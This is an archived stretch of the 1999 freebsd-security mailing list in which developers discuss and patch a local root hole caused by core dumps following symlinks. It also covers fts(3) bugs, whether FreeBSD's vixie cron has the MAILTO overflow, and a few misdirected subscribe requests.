<199908262056.NAA03100@implode.root.com> To: dima@best.net Cc: imp@village.org (Warner Losh), gsutter@pobox.com (Gregory Sutter), security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-reply-to: Your message of "Thu, 26 Aug 1999 10:58:45 PDT." <199908261758.KAA94925@burka.rdy.com> From: David Greenman Reply-To: dg@root.com Date: Thu, 26 Aug 1999 13:56:29 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yikes, you're not proposing that we disable following of symlinks that point to binaries, are you? -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project - http://www.freebsd.org Creator of high-performance Internet servers - http://www.terasolutions.com Pave the road of life with opportunities. >Warner Losh writes: >> In message <199908261738.KAA94664@burka.rdy.com> Dima Ruban writes: >> : I've just committed a fix. >> >> Thanks Dima. It was first thing on my list after catching up on my >> email. Wanna write the advisory? Or at least give me verfied patch > >I'm not very good at writing advisories :-) > >> files? >> >> Warner >> > >-- dima > >For -current: > >*** kern/imgact_elf.c 1999/07/09 19:10:14 1.61 >--- kern/imgact_elf.c 1999/08/26 17:32:48 1.62 >*************** >*** 722,729 **** > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ > >! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >--- 722,729 ---- > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ > >! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >*** kern/imgact_aout.c 1999/05/17 00:53:36 1.52 >--- kern/imgact_aout.c 1999/08/26 17:32:48 1.53 >*************** >*** 264,271 **** > name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ >! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >--- 264,271 ---- > name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ >! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >----------cut here > >For 3.x-stable: > >*** kern/imgact_elf.c 1999/07/15 13:01:54 1.44.2.4 >--- kern/imgact_elf.c 1999/08/26 17:35:03 1.44.2.5 >*************** >*** 699,706 **** > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ > >! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >--- 699,706 ---- > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ > >! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >*** kern/imgact_aout.c 1999/04/14 04:55:22 1.44.2.1 >--- kern/imgact_aout.c 1999/08/26 17:35:02 1.44.2.2 >*************** >*** 259,266 **** > name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ >! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >--- 259,266 ---- > name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ >! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 14: 7:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (Postfix) with ESMTP id 2630E14C84; Thu, 26 Aug 1999 14:07:37 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.9.3/RDY&DVV) id OAA97706; Thu, 26 Aug 1999 14:04:42 -0700 (PDT) Message-Id: <199908262104.OAA97706@burka.rdy.com> Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <199908262056.NAA03100@implode.root.com> from David Greenman at "Aug 26, 1999 01:56:29 pm" To: dg@root.com Date: Thu, 26 Aug 1999 14:04:42 -0700 (PDT) Cc: dima@best.net, imp@village.org (Warner Losh), gsutter@pobox.com (Gregory Sutter), security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David Greenman writes: > Yikes, you're not proposing that we disable following of symlinks that > point to binaries, are you? I'm sorry? I'm not sure I've got your question ... What binaries? This patch prevents coredumps to follow symlinks, that's it. Or is there a side effect? > > -DG > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 14:16:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from implode.root.com (root.com [209.102.106.178]) by hub.freebsd.org (Postfix) with ESMTP id AD8B114FCC; Thu, 26 Aug 1999 14:16:53 -0700 (PDT) (envelope-from dg@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.8/8.8.5) with ESMTP id OAA03219; Thu, 26 Aug 1999 14:16:17 -0700 (PDT) Message-Id: <199908262116.OAA03219@implode.root.com> To: dima@best.net, imp@village.org (Warner Losh), gsutter@pobox.com (Gregory Sutter), security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-reply-to: Your message of "Thu, 26 Aug 1999 13:56:29 PDT." <199908262056.NAA03100@implode.root.com> From: David Greenman Reply-To: dg@root.com Date: Thu, 26 Aug 1999 14:16:17 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Yikes, you're not proposing that we disable following of symlinks that >point to binaries, are you? Ah, nevermind, there wasn't enough context in those context diffs. I see now that this only affects core files that are created. -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project - http://www.freebsd.org Creator of high-performance Internet servers - http://www.terasolutions.com Pave the road of life with opportunities. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 15:11:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8EB3A1548D; Thu, 26 Aug 1999 15:11:52 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id QAA86340; Thu, 26 Aug 1999 16:11:51 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id QAA68314; Thu, 26 Aug 1999 16:13:09 -0600 (MDT) Message-Id: <199908262213.QAA68314@harmony.village.org> To: dg@root.com Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Cc: dima@best.net, gsutter@pobox.com (Gregory Sutter), security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 26 Aug 1999 13:56:29 PDT." <199908262056.NAA03100@implode.root.com> References: <199908262056.NAA03100@implode.root.com> Date: Thu, 26 Aug 1999 16:13:09 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908262056.NAA03100@implode.root.com> David Greenman writes: : Yikes, you're not proposing that we disable following of symlinks that : point to binaries, are you? No. Just following symlinks when dumping core. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 16:34:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.aye.net (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (Postfix) with SMTP id C11EE15482 for ; Thu, 26 Aug 1999 16:34:27 -0700 (PDT) (envelope-from barrett@phoenix.aye.net) Received: (qmail 16336 invoked by uid 1000); 26 Aug 1999 23:25:33 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 26 Aug 1999 23:25:33 -0000 Date: Thu, 26 Aug 1999 19:25:33 -0400 (EDT) From: Barrett Richardson To: Warner Losh Cc: dg@root.com, dima@best.net, Gregory Sutter , security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <199908262213.QAA68314@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Aug 1999, Warner Losh wrote: > In message <199908262056.NAA03100@implode.root.com> David Greenman writes: > : Yikes, you're not proposing that we disable following of symlinks that > : point to binaries, are you? > > No. Just following symlinks when dumping core. > > Warner > On Digital Unix where core dumps are a big problem with setuid binaries and the symlink issue, core dumps are disabled on binaries that do not have a read bit set. This offers an "on the fly" workaround. - Barrett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 16:47: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from zone.unixshell.com (zone.syracuse.net [209.2.141.6]) by hub.freebsd.org (Postfix) with ESMTP id 1B0D51542D for ; Thu, 26 Aug 1999 16:46:57 -0700 (PDT) (envelope-from mayres@zone.unixshell.com) Received: from localhost (mayres@localhost) by zone.unixshell.com (8.9.3/8.9.3) with ESMTP id TAA77583 for ; Thu, 26 Aug 1999 19:44:59 -0400 (EDT) (envelope-from mayres@zone.unixshell.com) Date: Thu, 26 Aug 1999 19:44:58 -0400 (EDT) From: Matt Ayres To: freebsd-security@FreeBSD.ORG Subject: subscribe Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 16:47:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 910AA15DB5; Thu, 26 Aug 1999 16:47:30 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id RAA86777; Thu, 26 Aug 1999 17:47:10 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id RAA69353; Thu, 26 Aug 1999 17:48:29 -0600 (MDT) Message-Id: <199908262348.RAA69353@harmony.village.org> To: Barrett Richardson Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Cc: dg@root.com, dima@best.net, Gregory Sutter , security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 26 Aug 1999 19:25:33 EDT." References: Date: Thu, 26 Aug 1999 17:48:28 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Barrett Richardson writes: : On Digital Unix where core dumps are a big problem with setuid : binaries and the symlink issue, core dumps are disabled on : binaries that do not have a read bit set. This offers an "on : the fly" workaround. Setuid binaries already don't dump core. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 17: 6:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.aye.net (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (Postfix) with SMTP id F3E7215DE4 for ; Thu, 26 Aug 1999 17:05:39 -0700 (PDT) (envelope-from barrett@phoenix.aye.net) Received: (qmail 24232 invoked by uid 1000); 26 Aug 1999 23:57:28 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 26 Aug 1999 23:57:28 -0000 Date: Thu, 26 Aug 1999 19:57:28 -0400 (EDT) From: Barrett Richardson To: Warner Losh Cc: dg@root.com, dima@best.net, Gregory Sutter , security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <199908262348.RAA69353@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Aug 1999, Warner Losh wrote: > In message Barrett Richardson writes: > : On Digital Unix where core dumps are a big problem with setuid > : binaries and the symlink issue, core dumps are disabled on > : binaries that do not have a read bit set. This offers an "on > : the fly" workaround. > > Setuid binaries already don't dump core. > > Warner > What I didn't mention was the that a 'chmod -r xxxx' disables core dumps on binaries whether setuid or not on Digital Unix (which will happily dump core for a setuid binary -- I know, its silly). - Barrett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 20:38: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 21CDA1532A for ; Thu, 26 Aug 1999 20:37:46 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id NAA19831; Fri, 27 Aug 1999 13:35:51 +1000 Date: Fri, 27 Aug 1999 13:35:51 +1000 From: Bruce Evans Message-Id: <199908270335.NAA19831@godzilla.zeta.org.au> To: hart@iserver.com, imp@village.org Subject: Re: FreeBSD (and other BSDs?) local root explot] Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >: Has anyone investigated patches to the fts(3) functions in libc? We've >: seen kernel patches (to stop following symbolic links when dumping core?) >: but it would be nice to fix the fts(3) bugs as well that started all of >: this. > >Bruce has done that. He's trying to get them to the point he's happy I checked my backups and found that I fixed it on May 6 (a week before the first BUGTRAQ mail about it that I know of). Requests for reviews were not responded to :-(. >with them and track down all the implied POSIX issues that might >result from changing fts. I will admit that I've been slow in the Actually, all the C portability and programming issues. fts does bad things like pointer arithmetic with pointers to storage that may have been invalidated by realloc(). >This exploit pointed out several bugs. periodic shouldn't allow its I wanted a review because I'm not a security person and didn't want to guess the extent of the bug. >children to dump core (since you don't want new core files in your >dump every day), core dumps *MUST*NOT* follow symbolic links (which >they didn't do in 2.x, but there was some back sliding in 3.x and 4.x >in this area), fts has an overflow which can cause problems in large, >wide trees. Had any one of these been different, the problem would >not have happened. There are also some downstream issues with many I think the pointer bug would just have been harder to exploit. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 20:59:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from tor-dev1.nbc.netcom.ca (tor-dev1.nbc.netcom.ca [207.181.89.12]) by hub.freebsd.org (Postfix) with ESMTP id 24ED114E01 for ; Thu, 26 Aug 1999 20:59:10 -0700 (PDT) (envelope-from taob@tor-dev1.nbc.netcom.ca) Received: by tor-dev1.nbc.netcom.ca (8.9.1/8.9.1) id XAA23742; Thu, 26 Aug 1999 23:58:38 -0400 (EDT) Date: Thu, 26 Aug 1999 23:58:38 -0400 (EDT) From: Brian Tao X-Sender: taob@tor-dev1.nbc.netcom.ca To: FREEBSD-SECURITY Subject: Buffer overflow in vixie cron? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org RedHat published a security advisory for the version of vixie-cron included in RH 4.2, 5.2 and 6.0 today. Is our version also vulnerable? I haven't seen the diffs yet, but it is in the cron_popen() call in /usr/src/usr.sbin/cron/cron/popen.c . -- Brian Tao (BT300, taob@risc.org) "Though this be madness, yet there is method in't" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 21:20:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 6321215487 for ; Thu, 26 Aug 1999 21:20:55 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Thu, 26 Aug 1999 22:20:54 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma003126; Thu, 26 Aug 99 22:20:50 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id WAA08064; Thu, 26 Aug 1999 22:19:54 -0600 (MDT) Date: Thu, 26 Aug 1999 22:19:54 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Brian Tao Cc: freebsd-security@FreeBSD.ORG Subject: Re: Buffer overflow in vixie cron? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Aug 1999, Brian Tao wrote: > RedHat published a security advisory for the version of vixie-cron > included in RH 4.2, 5.2 and 6.0 today. Is our version also vulnerable? I don't believe so. I looked through 3.2-STABLE and didn't see any overflows. I haven't looked at the exact Linux diff, but from the description of the problem it sounds like they fixed the line where the sendmail pipe command string buffer is built. Our code already uses snprintf when using the MAILTO value, but the original Vixie cron used sprintf without length checks in both version 3.0 and 3.0.1. I'm assuming that's where the hole was. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 22: 3:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107]) by hub.freebsd.org (Postfix) with ESMTP id 139DB1514E for ; Thu, 26 Aug 1999 22:03:34 -0700 (PDT) (envelope-from snar@lucky.net) Received: (from snar@localhost) by burka.carrier.kiev.ua (8.Who.Cares/Guinness_Is_Better) id IAA15767; Fri, 27 Aug 1999 08:01:58 +0300 (EEST) (envelope-from snar) Message-ID: <19990827080158.A15699@lucky.net> Date: Fri, 27 Aug 1999 08:01:58 +0300 From: Alexandre Snarskii To: Brian Tao , FREEBSD-SECURITY Subject: Re: Buffer overflow in vixie cron? References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.90.11i In-Reply-To: ; from Brian Tao on Thu, Aug 26, 1999 at 11:58:38PM -0400 X-NCC-RegID: ua.luckynet Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Aug 26, 1999 at 11:58:38PM -0400, Brian Tao wrote: > RedHat published a security advisory for the version of vixie-cron > included in RH 4.2, 5.2 and 6.0 today. Is our version also > vulnerable? I haven't seen the diffs yet, but it is in the > cron_popen() call in /usr/src/usr.sbin/cron/cron/popen.c . That bug is not from cron_popen(), but from the paramerers to that call. Really, in classic vixie cron there were a chance to prepare _any_ command string to execute. FreeBSD is not vulnerabile since 1995 (2.0.5-alpha) ( cite from: http://www.freebsd.org/cgi/cvsweb.cgi/src/usr.sbin/cron/cron/do_command.c ) 1.4 Fri Apr 14 21:54:18 1995 UTC by ache CVS Tags: RELENG_2_0_5_ALPHA Diffs to 1.3 Fix MAILTO hole by passing -t to sendmail Submitted by: Mike Pritchard _________________________________________________________________ 1.3 Thu Apr 13 20:58:13 1995 UTC by ache Diffs to 1.2 Really fix MAILTO hole by parsing spaces. Remove local bitstring copy _________________________________________________________________ 1.2 Wed Apr 12 18:57:37 1995 UTC by ache Diffs to 1.1 Close MAILTO security hole -- Alexander Snarskii the source code is included. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 1:21:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from mrelay.jrc.it (mrelay.jrc.it [139.191.1.65]) by hub.freebsd.org (Postfix) with ESMTP id 0FAE515011 for ; Fri, 27 Aug 1999 01:20:49 -0700 (PDT) (envelope-from nick.hibma@jrc.it) Received: from elect8 (elect8.jrc.it [139.191.71.152]) by mrelay.jrc.it (LMC5692) with ESMTP id KAA10896; Fri, 27 Aug 1999 10:20:37 +0200 (MET DST) Date: Fri, 27 Aug 1999 10:20:38 +0200 (MET DST) From: Nick Hibma X-Sender: n_hibma@elect8 Reply-To: Nick Hibma To: Matt Ayres Cc: freebsd-security@FreeBSD.ORG Subject: Re: subscribe In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Try again, but send the message to majordomo@freebsd.org with in the body of the message: subscribe freebsd-security > subscribe > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 1:41:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from pubnix.org (pubnix.org [209.3.192.40]) by hub.freebsd.org (Postfix) with ESMTP id 31A60152CA for ; Fri, 27 Aug 1999 01:41:34 -0700 (PDT) (envelope-from jtb@pubnix.org) Received: from localhost (jtb@localhost) by pubnix.org (8.9.1/8.9.1) with ESMTP id EAA26927; Fri, 27 Aug 1999 04:37:53 -0400 (EDT) Date: Fri, 27 Aug 1999 04:37:52 -0400 (EDT) From: jtb To: Nick Hibma Cc: Matt Ayres , freebsd-security@FreeBSD.ORG Subject: Re: subscribe In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just a guess but I'd bet he's not going to get that. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Jonathan T. Bowie ADM w00w00 WSD jobe@sekurity.org jtb@pubnix.org jobe@dataforce.net Independant Security Developer Home: (603)436-5698 "I'd hate to advocate drugs, sex, alcohol, or Cell: (603)553-6697 violence... to any one, but they've worked for me." -- Hunter S. Thompson =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= On Fri, 27 Aug 1999, Nick Hibma wrote: > > Try again, but send the message to majordomo@freebsd.org with in the > body of the message: > > subscribe freebsd-security > > > > > subscribe > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > -- > ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 5: 0: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from noc.santacruz.org (noc.santacruz.org [209.133.111.168]) by hub.freebsd.org (Postfix) with ESMTP id 8371B15137 for ; Fri, 27 Aug 1999 05:00:05 -0700 (PDT) (envelope-from klynn@santacruz.org) Received: by noc.santacruz.org (Postfix, from userid 1003) id 31070CD44; Fri, 27 Aug 1999 05:03:10 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by noc.santacruz.org (Postfix) with ESMTP id 206A5CD43; Fri, 27 Aug 1999 05:03:10 -0700 (PDT) Date: Fri, 27 Aug 1999 05:03:10 -0700 (PDT) From: Kevin Lynn To: Nick Hibma Cc: Matt Ayres , freebsd-security@FreeBSD.ORG Subject: Re: subscribe In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Didn't I just read that one in "How many FreeBSD users does it take to change a lightbulb?" :P On Fri, 27 Aug 1999, Nick Hibma wrote: > > Try again, but send the message to majordomo@freebsd.org with in the > body of the message: > > subscribe freebsd-security > > > > > subscribe > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 5:15:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 1163F15EA9; Fri, 27 Aug 1999 05:15:06 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA00774; Fri, 27 Aug 1999 09:14:22 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199908271214.JAA00774@ns1.sminter.com.ar> Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <199908261758.KAA94925@burka.rdy.com> from Dima Ruban at "Aug 26, 99 10:58:45 am" To: dima@best.net Date: Fri, 27 Aug 1999 09:14:22 -0300 (GMT) Cc: imp@village.org, dima@best.net, gsutter@pobox.com, security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Patches for 2.2.8 are too much asking? Regards! En un mensaje anterior, Dima Ruban escribió: > Warner Losh writes: > > In message <199908261738.KAA94664@burka.rdy.com> Dima Ruban writes: > > : I've just committed a fix. [...] > For -current: > > *** kern/imgact_elf.c 1999/07/09 19:10:14 1.61 > --- kern/imgact_elf.c 1999/08/26 17:32:48 1.62 > *************** > *** 722,729 **** [...] Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA Diagonal Roque Sáenz Peña 971, 4º y 5º piso. 1035 - Capital Federal, Argentina. (54-11) 4323-3333 http://www.via-net-works.net.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 5:21: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id A1F7B151CF; Fri, 27 Aug 1999 05:20:51 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id OAA06004; Fri, 27 Aug 1999 14:20:17 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id OAA37744; Fri, 27 Aug 1999 14:20:17 +0200 (MET DST) Date: Fri, 27 Aug 1999 14:20:16 +0200 From: Eivind Eklund To: Fernando Schapachnik Cc: dima@best.net, imp@village.org, gsutter@pobox.com, security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Message-ID: <19990827142016.U79110@bitbox.follo.net> References: <199908261758.KAA94925@burka.rdy.com> <199908271214.JAA00774@ns1.sminter.com.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: 